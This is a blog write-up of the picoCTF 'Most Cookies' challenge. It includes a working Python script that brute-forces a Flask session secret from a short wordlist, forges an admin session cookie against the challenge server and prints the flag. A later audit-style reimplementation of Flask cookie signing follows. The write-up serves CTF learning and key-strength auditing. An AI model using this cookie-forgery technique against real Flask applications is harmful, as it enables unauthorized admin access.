
[pico CTF] Most Cookies

by skyepodium 2022. 6. 13.

1. Overview

A Flask session-tampering challenge.

I had no idea how to approach it, so I referred to these two write-ups:

https://ctftime.org/writeup/26978

https://blog.paradoxis.nl/defeating-flasks-session-management-65706ba9d3ce


2. Analysis

At first glance the challenge makes no sense.

The cookie's very_auth value has to be admin:

		check = session["very_auth"]
		if check == "admin":


But very_auth is set from the cookie_names list, which contains no value admin:

cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

session["very_auth"] = request.form["name"]


In other words, we have to obtain a legitimately issued cookie and then tamper with it so that very_auth becomes admin. Flask session cookies are signed, though, so forging one requires the server's secret key; the exploit below recovers that key from the cookie.


3. Exploit

1) Obtain a legitimate cookie

2) Recover the secret from the cookie

3) Build an admin cookie with the secret

4) Get the flag with the admin cookie


import requests
import re
import hashlib
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature

# The server picks its secret_key from this same list, so it doubles as the wordlist.
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

# 1) Obtain a legitimately signed session cookie by searching for any cookie name.
def get_cookie(cookie_name):
    session = requests.Session()
    r = session.post('http://mercury.picoctf.net:44693/search', data={'name': cookie_name})

    # Set-Cookie looks like "session=<value>; HttpOnly; Path=/"; keep only "session=<value>".
    return r.headers["Set-Cookie"].split("; ")[0]

# 2) Try every candidate as secret_key using Flask's exact session settings
#    (salt 'cookie-session', HMAC key derivation, SHA-1 digest). loads() raises
#    BadSignature for every wrong key and returns the session dict for the right one.
def get_secret(cookie):
    for cookie_name in cookie_names:
        try:
            URLSafeTimedSerializer(
                secret_key=cookie_name,
                salt='cookie-session',
                serializer=TaggedJSONSerializer(),
                signer=TimestampSigner,
                signer_kwargs={
                    'key_derivation': 'hmac',
                    'digest_method': hashlib.sha1
                }).loads(cookie.split("=", 1)[1])
        except BadSignature:
            continue

        return cookie_name

    return None  # no candidate verified the cookie

# 3) Sign a fresh session dict with the recovered key, exactly as the server would.
def make_admin_cookie(secret):
    return (URLSafeTimedSerializer(
        secret_key=secret,
        salt='cookie-session',
        serializer=TaggedJSONSerializer(),
        signer=TimestampSigner,
        signer_kwargs={
            'key_derivation': 'hmac',
            'digest_method': hashlib.sha1
        }
    ).dumps({'very_auth': 'admin'}))

# 4) Present the forged cookie to /display and pull the flag out of the response.
def get_flag(cookie):
    session = requests.Session()
    r = session.get('http://mercury.picoctf.net:44693/display', headers={'Cookie': f"session={cookie}"})

    return re.findall("picoCTF{[a-zA-Z0-9_]+}", r.text)


if __name__ == "__main__":
    cookie = get_cookie(cookie_names[0])

    secret = get_secret(cookie)
    print("real secret", secret)

    admin_cookie = make_admin_cookie(secret)

    flags = get_flag(admin_cookie)
    print("flags", flags[0])

Output:

real secret butter
flags picoCTF{pwn_4ll_th3_cook1E5_dbfe90bf}
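To make the key-recovery step concrete from the defender's side, here is an added example (not from the original post) that reimplements the Flask/itsdangerous signing chain with only the standard library and uses it as a key-strength audit: a cookie signed with a key from the wordlist is identified, while one signed with a random 32-byte key is not. The timestamp layout assumed is that of itsdangerous 2.x, and CANDIDATE_KEYS is a constructed subset of the challenge's cookie_names.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

SALT = b"cookie-session"  # salt Flask passes to itsdangerous for the session cookie
# Constructed subset of the challenge's cookie_names, used here as the key wordlist.
CANDIDATE_KEYS = ["snickerdoodle", "chocolate chip", "sugar", "butter", "spritz", "wafer"]

def _b64(data):
    # itsdangerous uses URL-safe base64 with the '=' padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _derived_key(secret_key):
    # key_derivation='hmac': the signing key is HMAC-SHA1(secret, salt), not the secret itself
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()

def sign_session(secret_key, data, timestamp=None):
    # Mirrors URLSafeTimedSerializer.dumps(): base64(json) '.' base64(timestamp) '.' base64(sig)
    # Timestamp layout follows itsdangerous 2.x (Unix seconds as big-endian bytes); an assumption.
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = _b64(json.dumps(data, separators=(",", ":")).encode()) + "." + _b64(ts_bytes)
    sig = hmac.new(_derived_key(secret_key), value.encode(), hashlib.sha1).digest()
    return value + "." + _b64(sig)

def verify_session(secret_key, cookie):
    # Recompute the HMAC over everything before the last '.' and compare in constant time
    value, _, sig_b64 = cookie.rpartition(".")
    expected = hmac.new(_derived_key(secret_key), value.encode(), hashlib.sha1).digest()
    actual = base64.urlsafe_b64decode(sig_b64 + "=" * (-len(sig_b64) % 4))
    return hmac.compare_digest(expected, actual)

def weak_key_in_list(cookie, candidates):
    # Key-strength audit: return the guessable key if any candidate verifies the cookie, else None
    for candidate in candidates:
        if verify_session(candidate.encode(), cookie):
            return candidate
    return None

if __name__ == "__main__":
    weak = sign_session(b"butter", {"very_auth": "snickerdoodle"})
    strong = sign_session(secrets.token_bytes(32), {"very_auth": "snickerdoodle"})
    print("weak key found:", weak_key_in_list(weak, CANDIDATE_KEYS))      # butter
    print("strong key found:", weak_key_in_list(strong, CANDIDATE_KEYS))  # None
```

Running the audit against a cookie from a deployed Flask app with a list of common or leaked keys tells you whether the session secret is guessable without touching the application itself.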
